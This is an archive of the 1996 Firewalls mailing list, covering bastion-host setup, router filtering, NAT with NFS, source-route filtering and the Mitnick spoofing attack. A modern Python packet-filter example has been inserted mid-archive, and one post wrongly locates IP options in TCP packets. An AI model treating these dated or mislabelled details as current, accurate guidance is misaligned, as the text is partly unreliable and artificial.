Date: Fri, 5 Jan 1996 20:22:58 -0800 Subject: Re: Security managing Cisco Routers >>>At 02:15 PM 12/27/95 GMT, Pietro wrote: >>> >>>>My actual problem is to managed several Cisco Routers situated >>>>on a public network from a central site, from where there is no >>>>way to garantee secure communication. >>>> > >>I have heard that Firewall-1 will manage the configurations of CISCO >>routers remotely. 
I believe the way it works is that you set up the >>configuration or a Firewall-1 Administrative Workstations and it send >>some sort of encrypted/secured transmission to the router to downlowd the >>new config. >>Bill >> > >Although I'm not intimately familiar with the internal mechanisms of >Firewall-1, I do have a problem with the above paragraph, since we >do not (yet) support encrypted transport mechanisms. :-) > >- paul > >-- >Paul Ferguson || || >Consulting Engineering || || >Reston, Virginia USA |||| |||| >tel: +1.703.716.9538 ..:||||||:..:||||||:.. >e-mail: pferguso@cisco.com c i s c o S y s t e m s > > Paul, Your absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters. I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response. Bill ------------------------------ From: Bill Husler Date: Fri, 5 Jan 1996 20:46:16 -0800 Subject: Re: SSL and S-HTTP Proxy support >From: Brian W. McKenney, mckenney@smiley.mitre.org > >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. > >This is the information that I have: > >1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >2. KarlBridge/KarlBrouter: S-HTTP proxy >3. Milkyway Blackhole: S--HTTP >4. SOS Brimstone: S-HTTP proxy >5. Technologic Interceptor: S-HTTP proxy >6. V-One SmartWall: S-HTTP proxy > >License versions of TIS Gauntlet will support whatever the next Gauntlet >release supports. > You can add ANS Interlock to you list. Bill ------------------------------ From: bart@pu.com (Bart Rivard) Date: Sat, 6 Jan 1996 01:49:18 -0600 Subject: Steps in building a firewall, Right or Wrong? 
Hi,

I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here are the steps I have taken; tell me what you think.

1) Installed FreeBSD on a Pentium 100 with 32 MB of RAM and two Ethernet NICs
2) Configured the kernel such that IP forwarding and source routing are disabled.
3) Deleted all accounts on the system except root
4) Gave root a password with numbers, letters, uppercase and lowercase, 10 long
5) Deleted everything out of inetd.conf except DNS
6) Configured DNS so that the only machines it knows about are a Web server which is in the DMZ and the firewall machine, plus a wildcard MX record.
7) Configured resolv.conf on the firewall to point to the internal network DNS.
8) Turned off source routing on the CISCO 2500 router and added filters which disable all UDP traffic except port DNS/53, and all TCP inbound traffic except SMTP to the firewall, news from a specific news server to the firewall, and http to the web server in the DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on the router, what do you think?
9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to the web proxy by network interface but don't know how?
10) Modified a mail program so that it reads mail from port 25 and writes the mail messages to disk. Completely dumb program. Does not handle distribution lists, aliases or anything. I then pick mail up off of disk and send it to the internal CC mail gateway. Was there shareware to do the equivalent? Can sendmail pick mail up off of disk? Is it safe to have sendmail pick mail up off of disk and distribute?
11) Put TCP Wrapper around the news server port to only accept connections from our news provider at AT&T and the internal network. Also use inn access control to limit access from the internal network for reading news and from the news provider for dumping news.

Well, that's about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass the firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server, so we don't allow news to pass through the firewall. Is it safe to use a firewall as a news server?

Please comment!! Send all comments to bart@pu.com.

TIA,
Bart

------------------------------

End of Firewalls-Digest V5 #8
*****************************

To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM":

unsubscribe firewalls-digest

To subscribe, send the command "subscribe firewalls-digest" instead.

If you want to subscribe or unsubscribe something other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls":

subscribe firewalls-digest local-firewalls@your.domain.net

A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls".

Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number).
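The router filter Bart describes in step 8 of the digest message above, worked through as an added example (this is not Bart's Cisco 2500 configuration and not any vendor's code): a first-match packet-filter evaluator in Python that encodes the step-8 policy and decides sample packets against it. The firewall, DMZ web server and news-provider addresses are constructed documentation-range values chosen for the example; the internal range 192.168.0.0/16 is the one his post names. ICMP, which he is still weighing, is a switch on the policy so both outcomes can be compared.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed addresses for the example (assumptions, not from the post).
FIREWALL = "192.0.2.1"        # the FreeBSD bastion's outside address
WEB_SERVER = "192.0.2.80"     # the web server that sits in the DMZ
NEWS_PROVIDER = "198.51.100.5"  # the one news server allowed to feed the firewall
INTERNAL = "192.168.0.0/16"   # named in the post


@dataclass(frozen=True)
class Packet:
    direction: str          # "in" = arriving from the Internet, "out" = leaving toward it
    proto: str              # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: Optional[int] = None   # None for ICMP


@dataclass(frozen=True)
class Rule:
    action: str                   # "allow" or "deny"
    direction: str                # "in", "out" or "any"
    proto: str                    # "tcp", "udp", "icmp" or "any"
    src: Optional[str] = None     # host or network in CIDR form; None matches anything
    dst: Optional[str] = None
    dport: Optional[int] = None


def _in(addr: str, spec: Optional[str]) -> bool:
    """True when addr falls inside spec (a host string becomes a /32)."""
    return spec is None or ip_address(addr) in ip_network(spec, strict=False)


def matches(rule: Rule, pkt: Packet) -> bool:
    return (rule.direction in ("any", pkt.direction)
            and rule.proto in ("any", pkt.proto)
            and _in(pkt.src, rule.src)
            and _in(pkt.dst, rule.dst)
            and (rule.dport is None or rule.dport == pkt.dport))


def policy(block_icmp: bool = True) -> List[Rule]:
    """The step-8 rule set, in the order a first-match filter would walk it."""
    rules = [
        Rule("allow", "any", "udp", dport=53),                    # UDP only to DNS/53
        Rule("deny", "any", "udp"),                               # no other UDP either way
        Rule("allow", "in", "tcp", dst=FIREWALL, dport=25),       # SMTP to the firewall only
        Rule("allow", "in", "tcp", src=NEWS_PROVIDER, dst=FIREWALL, dport=119),  # NNTP feed
        Rule("allow", "in", "tcp", dst=WEB_SERVER, dport=80),     # HTTP to the DMZ web server
        Rule("allow", "out", "tcp"),                              # all outbound TCP
    ]
    if not block_icmp:
        rules.append(Rule("allow", "any", "icmp"))                # the option he is weighing
    rules.append(Rule("deny", "any", "any"))                      # implicit deny made explicit
    return rules


def evaluate(pkt: Packet, rules: Optional[List[Rule]] = None) -> str:
    """First matching rule decides; an empty rule list denies."""
    for rule in (policy() if rules is None else rules):
        if matches(rule, pkt):
            return rule.action
    return "deny"


if __name__ == "__main__":
    samples = [
        Packet("in", "tcp", "203.0.113.9", FIREWALL, 25),
        Packet("in", "tcp", "203.0.113.9", FIREWALL, 119),
        Packet("in", "tcp", NEWS_PROVIDER, FIREWALL, 119),
        Packet("in", "udp", "203.0.113.9", FIREWALL, 514),
        Packet("in", "icmp", "203.0.113.9", FIREWALL),
    ]
    for p in samples:
        print(p, "->", evaluate(p))
```

The example keys UDP on destination port only, which is exactly what "all UDP except DNS/53" says; note that a DNS reply comes back from source port 53 to an ephemeral destination port, so a real filter written this way also needs a source-port-53 clause, and that clause is the classic hole (anything sent from source port 53 then passes the router). That is the trade-off the post's step 8 leaves open.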
From firewalls-owner Tue Jan 9 21:22:41 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA03606 for firewalls-outgoing; Tue, 9 Jan 1996 21:00:18 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA03601 for ; Tue, 9 Jan 1996 21:00:14 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id XAA15779; Tue, 9 Jan 1996 23:57:55 -0500
Date: Tue, 9 Jan 1996 23:57:55 -0500 (EST)
From: Brain21
To: Neil
cc: firewalls@GreatCircle.COM
Subject: Re: Source Routed Packets
In-Reply-To: <960105133833.212c@rmcs.cranfield.ac.uk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 5 Jan 1996, Neil wrote:
> I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel
> with IP packet forwarding turned off.
>
> The only problem is that SunOS will still (I believe) allow IP source
> routed packets through the bastion host.
>

This may be an ignorant question here, but are you able to filter on bit sequences on your machine, or just port #s??? If you can filter on specific bits, filter out, on the first 8 bits of the options field in the TCP packets (bits 161-168), when they have the following bit sequence:

10000011

This is loose source routing (strict source routing is the same bits, but w/ a sequence of 10001001).

Quick summary/options field quasi-tutorial:

   161             168
   +-+-+-+-+-+-+-+-+
   | | | | | | | | |      (I know my ascii sucks)
   +-+-+-+-+-+-+-+-+

bit 161 - "copied flag": states that options must be copied if the packet is fragmented (so it's "1" for "yes" or "on").
bits 162-163 - All are "0" except for Internet Time Stamp (which = "2" or "10", decimal and binary respectively)
bits 164-168 - Number or "ID" field - "3" = loose source routing, "9" = strict source routing (00011 and 01001 respectively)

so you have - 1 00 00011 for loose, and 1 00 01001 for strict.

This brings me to my next question. This is something that I have asked before, but I can't believe that only *1* firewall allows this!... What firewalls *WILL* allow you to filter on bit sequences like I illustrated above??? When I asked this last time the only answer that I got was that V-One will allow you to do this to create your own, more specific rules. Is that possible? Does only *ONE* vendor support this?

Thanks,
Brain21

From firewalls-owner Tue Jan 9 21:52:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04199 for firewalls-outgoing; Tue, 9 Jan 1996 21:44:30 -0800 (PST)
Received: from tide03.microsoft.com (tide03.microsoft.com [131.107.3.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04193 for ; Tue, 9 Jan 1996 21:44:26 -0800 (PST)
Received: by tide03.microsoft.com; id VAA20024; Tue, 9 Jan 1996 21:50:56 -0800
Received: from unknown(157.54.17.73) by tide03.microsoft.com via smap (g3.0.3) id xma020010; Tue, 9 Jan 96 21:50:36 -0800
Received: from xnet2 (xnet2.microsoft.com [157.54.17.205]) by imail1.microsoft.com (8.7.1/8.7.1) with SMTP id VAA29394 for ; Tue, 9 Jan 1996 21:46:09 -0800 (PST)
X-Received: from xmtp3 by xnet2 with receive; Tue, 9 Jan 1996 21:43:03 -0800
X-Received: from RED-70-MSG by xmtp3 with recvsmtp; Tue, 9 Jan 1996 21:42:51 -0800
Received: by red-70-msg.itg.microsoft.com with Microsoft Exchange (IMC 4.20.611) id <01BADEDB.6DD21AC0@red-70-msg.itg.microsoft.com>; Tue, 9 Jan 1996 21:42:52 -0800
Message-ID:
From: "Kurt Buff (Volt Comp)"
To: "firewalls@greatcircle.com"
Subject: ip subnetting
Date: Tue, 9 Jan 1996 21:42:50 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.20.611
X-MsXMTID: xmtp3960110054251RECVSMTP[01.52.00]00000123-62072
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Many thanks to those who replied from a relative newbie. I have rfc 1878 and am reviewing it. I will probably have replies privately to those who helped, as this is not strictly on topic for this list.

Kurt

From firewalls-owner Tue Jan 9 22:07:42 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04653 for firewalls-outgoing; Tue, 9 Jan 1996 21:58:15 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04648 for ; Tue, 9 Jan 1996 21:58:10 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id AAA16088; Wed, 10 Jan 1996 00:56:06 -0500
Date: Wed, 10 Jan 1996 00:56:06 -0500 (EST)
From: Brain21
To: Frank Willoughby
cc: firewalls@GreatCircle.COM, John Young
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To: <9601080441.AA17466@su1.in.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would like to know this... if Shimomura is so good (and I actually believe that he may be) then why did he leave the r-utils enabled? Why did he not use TCPWrappers to prevent spoofing? Why did he allow people to see inside his network (Mitnick saw that there was a machine "X-something" that he believed was trusted by Shimomura's machine)? I mean, I believe that Shimomura knew of the possibility of this type of attack WAY ahead of time (like months or years). Why no encryption to stop this type of attack? Why did he not use random sequence numbers? Was he just SOOO overwhelmed by his own greatness that he ignored these things?
There are those, so I've heard, that believe that his ego ended up getting the best of him (karma). I don't know him so I can not make a judgement either way, but which way does the evidence point? It just doesn't make sense. BTW, where did the "Official Spoofing Page" go? I think it used to be something like www.msen.com/tubed/spoofing.html or something like that. It went down a few months ago. Just wondering why... Brain21 From firewalls-owner Tue Jan 9 22:36:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA04052 for firewalls-outgoing; Tue, 9 Jan 1996 21:37:54 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA04047 for ; Tue, 9 Jan 1996 21:37:50 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id AAA15998; Wed, 10 Jan 1996 00:35:36 -0500 Date: Wed, 10 Jan 1996 00:35:36 -0500 (EST) From: Brain21 To: Bob Resino cc: grau@muc.de, firewalls@GreatCircle.COM Subject: Re: Off-Topic: Selling Firewalls In-Reply-To: <9601081347.AA15571@dsn20> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 8 Jan 1996, Bob Resino wrote: > > - how to draw network designs > > - how to calculate network topology, eg. IP-numbers and netmasks > > - how to calculate the costs for the equipment (firewalls, routers ...) > > - how to ... > > > You might want to think about a CAD package, like > Intergraph Microstation or IsiCad. The Microstation Don't know what they cost, but I believe that Microstation is MORE expensive than AutoCAD, which runs in the neighborhood of $5000. That's a little high for what the original poster wants to do, I think. Besides, he is obviously running Windows (mention of Powerpoint), and Microstation is UNIX isn't it? (not sure). 
I know that Freelance Graphic blows for this kind of stuff. Perhaps something like Corel Draw may be better? The latest version is 6.0, and I think you can get 5.0 and 4 for less than $100 or so now. This and a decent clipart package (or look, there is a usenet group for clip-art, I think) would be all that you really need for network diagrams. Then you could import these into Excel or 1-2-3 or something if you need to have cost projections and network diagrams on one page. As for IP addresses, etc. I think you are on your own there. Brain21 From firewalls-owner Tue Jan 9 23:07:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA06458 for firewalls-outgoing; Tue, 9 Jan 1996 23:00:15 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA06453 for ; Tue, 9 Jan 1996 23:00:10 -0800 (PST) Received: from wv.wv.mentorg.com by newsgw.mentorg.com (8.6.4/CF5.22R) id BAA10206; Wed, 10 Jan 1996 01:58:58 -0500 Received: from pdxml2.mentorg.com by wv.wv.mentorg.com (8.6.8.1/CF5.22R) id WAA29468; Tue, 9 Jan 1996 22:58:41 -0800 Message-ID: Date: 7 Jan 1996 01:56:55 -0800 From: "PDXML2" Subject: PLEASE RE-SEND, E-MAIL ADMI To: "firewalls-digest@GreatCircle.CO" X-Mailer: Mail*Link SMTP/QM 3.0.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mail*Link(r) SMTP Firewalls-Digest V5 #9 Received: by pdxml2.mentorg.com with SMTP;7 Jan 1996 01:51:21 -0800 Received: from relay7.UU.NET by newsgw.mentorg.com (8.6.4/CF5.22R) id EAA21637; Sun, 7 Jan 1996 04:45:54 -0500 Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQzxlu21430; Sun, 7 Jan 1996 04:37:25 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA07197 for firewalls-digest-outgoing; Sun, 7 Jan 1996 01:00:21 -0800 (PST) Date: Sun, 7 Jan 1996 01:00:21 -0800 (PST) Message-Id: <199601070900.BAA07197@miles.greatcircle.com> 
From: firewalls-digest-owner@uunet.uu.net
To: firewalls-digest@GreatCircle.COM
Subject: Firewalls-Digest V5 #9

Firewalls-Digest        Sunday, 7 January 1996        Volume 05 : Number 009

In this issue:

        RE: Bastion netmask query
        Re: NAT & NFS ?
        Re: Steps in building a firewall, Right or Wrong?
        Undeliverable Mail

----------------------------------------------------------------------

From: Paul Ferguson
Date: Sat, 06 Jan 1996 08:09:15 -0500
Subject: RE: Bastion netmask query

Sure, you could hack something together to do this, but why not simply
use RFC-1878 instead?

- paul

At 10:00 PM 1/4/96 -0800, Kurt Buff (Volt Comp) wrote:

>It seems to me that someone with half a brain (not me, I only have 1/4)
>could write a simple program (PERL, VB, ??) that would take some input
>(number of nodes, number of segments, network address(es), etc.) and output
>some reasonable netmasking and segmenting suggestions, including
>forbidden/unwise host addresses (due to broadcast address conflicts, etc.).
>Does anyone know of such a beastie? Or would this really be such a hard
>thing to write?
>
>Kurt
>

--
Paul Ferguson
Consulting Engineering
Reston, Virginia USA
tel: +1.703.716.9538
e-mail: pferguso@cisco.com
cisco Systems

------------------------------

From: jon@london.hcsc.com (Jon Shallow)
Date: Sat, 6 Jan 96 11:49:05 GMT
Subject: Re: NAT & NFS ?

Darren,

Some NAT definitions I am using to answer your NFS question.

NAT:      The change of an IP address within a packet to hide or withhold
          IP addresses that are not 'public'. This is implied when proxies
          are in use, but is also done in the IP layer.
external: One of potentially many interfaces which NATs packets as they
          pass over the interface.
internal: One of potentially many interfaces which does not NAT packets.
session:  Transmission and receipt of packets, which includes TCP/UDP
          transmits and ICMP error receipts.

Any packet 'session' can be initiated from internal to external, as the
internal host has full visibility of the external address space. The
external host will only see packets coming from the firewall. Returned
packets will get forwarded (with IP address translated) back to the
originator.

Any packet 'session' initiated from external will never get to internal,
as there is absolutely no visibility of the internal address space.

The above is true for all TCP, UDP, RPC, and ICMP packets. (For those
that do not know, RPC is a protocol using TCP or UDP packets as a
carrier. NFS then uses RPC for its communication protocol.)

Now to NFS .....

If an external host has an NFS exported file system, any internal host
can mount that file system (as permitted by the normal NFS export
rules). If NAT takes place at the IP layer, no extra work or enabling is
required at the firewall.

The things to be aware of:

1. The external host will see the NFS read/write etc. activity coming
   from the firewall IP address, not the internal host IP address. The
   exports file needs to reflect this.

2. The external host will see the mount request coming from the firewall
   IP address, and embedded within the mount request RPC packet is the
   name of the host doing the mount request. The external host will look
   up this embedded host name, and if the IP address is not the same as
   the firewall address, the mount request is refused. You will need to
   'fake' the internal host's IP address on the external host if the
   firewall cannot translate the embedded host name.

Regards

Jon

BTW Are there many firewalls out there that can filter on RPC, as NFS
through a firewall is scary. Harris CyberGuard can.

> In some mail from Jon Shallow, sie said:
> >
> > This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get
> > suitably rewritten - even the ICMP error codes.
> >
> > The 'inside' system can initiate talk to the 'external' system, but the
> > 'external' system has no knowledge of the 'internal' IP address - just
> > the firewall.
>
> This doesn't quite answer what I was wondering...
>
> I'm particularly interested in what this means for NFS...does it mean
> your internal systems need to be set up to allow the firewall to NFS to
> them so that external systems can be provided with NFS ?
>
> > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client
> > > and server, actively rewriting the addresses in all the packets involved ?
> > > If so, have any problems or unexpected situations arisen ?
>
> darren
>

------------------------------

From: "Joe Smith (Really!)"
Date: Sat, 6 Jan 1996 19:50:40 -0600 (CST)
Subject: Re: Steps in building a firewall, Right or Wrong?

On Sat, 6 Jan 1996, Bart Rivard wrote:

> 3) Deleted all accounts on the system except root

Unless you are limiting access to the system from the console, I would
create one account (secured as you did root) to log in to the system,
and then su to root to do admin work.

------------------------------

From: "Server #7000007"
Date: 6 Jan 1996 21:57:29 U
Subject: Undeliverable Mail

Unknown Microsoft mail form. Approximate representation follows.

Message: Firewalls-Digest V5 #7
Sent: Fri, Jan 5, 1996 9:36 PM
To: Harris Tom
On Server: PRC Bellevue NE MS
Date: Sat, Jan 6, 1996 9:57 PM
Reason: Could not be delivered because the destination Microsoft Mail
server could not be found.

------------------------------

End of Firewalls-Digest V5 #9
*****************************
From firewalls-owner Tue Jan 9 23:25:22 1996
From: Darren Reed
To: brain21@montag33.residence.gatech.edu (Brain21)
Cc: CARSON@rmcs.cranfield.ac.uk, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 18:10:51 +1100 (EDT)
Subject: Re: Source Routed Packets

In some mail from Brain21, sie said:
[...]
> What firewalls *WILL* allow you to filter on bit sequences like I
> illustrated above??? When I asked this last time the only answer that I
> got was that V-One will allow you to do this to create your own, more
> specific rules. Is that possible? Does only *ONE* vendor support this?

This is probably overkill in functionality vs performance.

Why is this such a problem? Because for every rule which allows you to
define an arbitrary bit sequence, you have to parse the packet a new way
to see if it matches. For a packet with IP options, it would mean
checking all the IP options present to see if any match the mask.

For IP options, this is somewhat not so useful, as there is a limited
number which are defined, and even fewer which work end-to-end in most
unix boxes. Filter languages, such as that from Cisco or IP Filter, will
recognise a large number (all) of the defined IP options.

I'd thus expect V-One's firewall to be twice as slow as, say, FW-1.

From firewalls-owner Wed Jan 10 00:10:33 1996
From: Sander Wels
To: firewalls@greatcircle.com
Date: Wed, 10 Jan 1996 08:45:49 +0100
Subject: Firewall setup

Currently I'm working on a project to implement what we call external
communication services, i.e. centrally provide means to dial out, dial
in for tele-workers and a connection to the internet. The dial-in
service is set up using M$ RAS and its dial-back facility. The dial-out
will be implemented using a Cisco 500 to create a modem pool. The
connection to the internet will be used to send mail and start FTP,
telnet and HTTP sessions from the secure network to the big and nasty
outer space.

To secure the internet connection, the mail and the dial-out service we
plan on using Firewall-1. The firewall will be located as follows:

   secure net
   -----------------------------------------------
          |                              |
     -----------                    ----------
     |  FW-1   |                    | MS RAS |------- dial in
     -----------                    ----------
      DMZ |  |
   -------+  |      ------------
   |         |                 |
-----------  |            -----------
|mail serv|  |            |Cisco 500|
-----------  |            -----------
             |                 |
          Internet          dial out

As one can see, we connect the internet to the firewall and create a DMZ
on a separate segment of the firewall. The Cisco can only be used to
dial out originating from the secure network (the phone lines will be
configured dial-out only). The MS RAS server will be set up to use dial
back to static locations, i.e. no mobile connections. The DMZ will
initially only be used to connect the mail server to; a WWW server may
be connected in the future.

Can anyone comment on this set up please. I would like to know the
risks and if this situation is secure :) or not :(.

TIA

Sander Wels

From firewalls-owner Wed Jan 10 10:11:26 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: ibg@oro.net
Cc: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:21 +0100 (MET)
Subject: Re: Firewalls-Digest V4 #726

From firewalls-owner Wed Jan 10 10:57:18 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: bei@io.com
Cc: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:59 +0100 (MET)
Subject: Re: Re^2: Holes in SunOS sendmail -Reading Root Mail

From firewalls-owner Wed Jan 10 11:25:30 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Mike
Cc: beames@ins.com, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:38 +0100 (MET)
Subject: Re: SNMP <-> Firewalls

From firewalls-owner Wed Jan 10 12:52:58 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Majordomo@au.wang.com
Cc: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:42 +0100 (MET)
Subject: Re: Majordomo results: Firewalls-Digest V4 #728

From firewalls-owner Wed Jan 10 12:56:23 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: packrat@tartarus.uwa.edu.au
Cc: firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:27 +0100 (MET)
Subject: Re: setuid/setgid local delivery agents

From firewalls-owner Wed Jan 10 13:13:20 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Kare.Presttun@ansf.alcatel.fr
Cc: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:20:39 +0100 (MET)
Subject: Re: FW-1 does not prevent session hijacking? Please support clai

From firewalls-owner Wed Jan 10 13:14:48 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Cc: firewalls@GreatCircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com
Date: Wed, 10 Jan 1996 09:20:14 +0100 (MET)
Subject: Re: Firewalls needed for both dial-in AND dial-out

From firewalls-owner Wed Jan 10 13:16:26 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Craig McLellan
Cc: firewalls, pietro
Date: Wed, 10 Jan 1996 09:20:16 +0100 (MET)
Subject: Re: Security managing Cisco Routers

From firewalls-owner Wed Jan 10 13:17:57 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Julian Assange
Cc: Sick Puppy, firewalls@greatcircle.com
Date: Wed, 10 Jan 1996 09:21:10 +0100 (MET)
Subject: Re: Dawg wants rootkit for Christmas

From firewalls-owner Wed Jan 10 13:19:33 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Darren Reed
Cc: Kenneth Smith, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:22:03 +0100 (MET)
Subject: Re: Firewalls - A Request

From firewalls-owner Wed Jan 10 13:21:11 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Marianne Mueller
Cc: raf@uzunx.com, firewalls@greatcircle.com, jcmurphy@smurfland.cit.buffalo.edu
Date: Wed, 10 Jan 1996 09:20:20 +0100 (MET)
Subject: Re: java info

From firewalls-owner Wed Jan 10 13:22:45 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Mike
Cc: nehynuci@nanaimo.ark.com, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:29 +0100 (MET)
Subject: Re: FW-1 does not prevent session hijacking? Please support claim.

From firewalls-owner Wed Jan 10 13:24:18 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Mike
Cc: nehynuci@nanaimo.ark.com, firewalls
Date: Wed, 10 Jan 1996 09:21:45 +0100 (MET)
Subject: Re: FW-1 does not prevent session hijacking? Please support claim.

From firewalls-owner Wed Jan 10 13:25:56 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Jon Spencer
Cc: Hany Mohamed Gaber, firewalls-digest-owner@uunet.uu.net, firewalls-digest@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:20:24 +0100 (MET)
Subject: Re: Firewalls-Digest V4 #726

From firewalls-owner Wed Jan 10 13:27:40 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Brain21
Cc: Gavin Ferreiro, "'firewalls@GreatCircle.COM'"
Date: Wed, 10 Jan 1996 09:20:44 +0100 (MET)
Subject: Re: Brain21

From firewalls-owner Wed Jan 10 13:29:16 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Adam Prato
Cc: Doug Hughes, Doug.Hughes@Eng.Auburn.EDU, mcleod@cynergy.com.au, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:20:33 +0100 (MET)
Subject: Re: Holes in SunOS sendmail -Reading Root Mail

From firewalls-owner Wed Jan 10 13:30:48 1996
Date: Wed, 10 Jan 96 09:52 PST
To: Firewalls@GreatCircle.COM
From: "Steven K. Sharp"
Subject: UDP and the unclean...

Please forgive me if this is a stupid question, but why is UDP such a
bad thing? Especially things like RealAudio; this uses UDP to
communicate (as do many other programs). What security risk does UDP
pose? I've seen that most people filter out all UDP first and then work
from there with TCP. Would it be a gaping hole to allow it?

Thanks for any clarification.

Steven

From firewalls-owner Wed Jan 10 13:32:28 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: wang
Cc: Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:28 +0100 (MET)
Subject: Re: Thank you for the code

From firewalls-owner Wed Jan 10 13:34:07 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Bill Gianopoulos
Cc: Doug Hughes, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:20:40 +0100 (MET)
Subject: Re: setuid/setgid local delivery agents

From firewalls-owner Wed Jan 10 14:11:23 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: Darren Reed
Cc: Brain21, frankw@in.net, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:21:47 +0100 (MET)
Subject: Re: FW-1 does not prevent session hijacking? Please support claim.

From firewalls-owner Wed Jan 10 14:14:33 1996
From: Rabid Wombat
To: Brain21
cc: Bob Resino, grau@muc.de, firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 12:36:05 -0500 (EST)
Subject: Re: Off-Topic: Selling Firewalls

On Wed, 10 Jan 1996, Brain21 wrote:

> On Mon, 8 Jan 1996, Bob Resino wrote:
> >
> > > - how to draw network designs
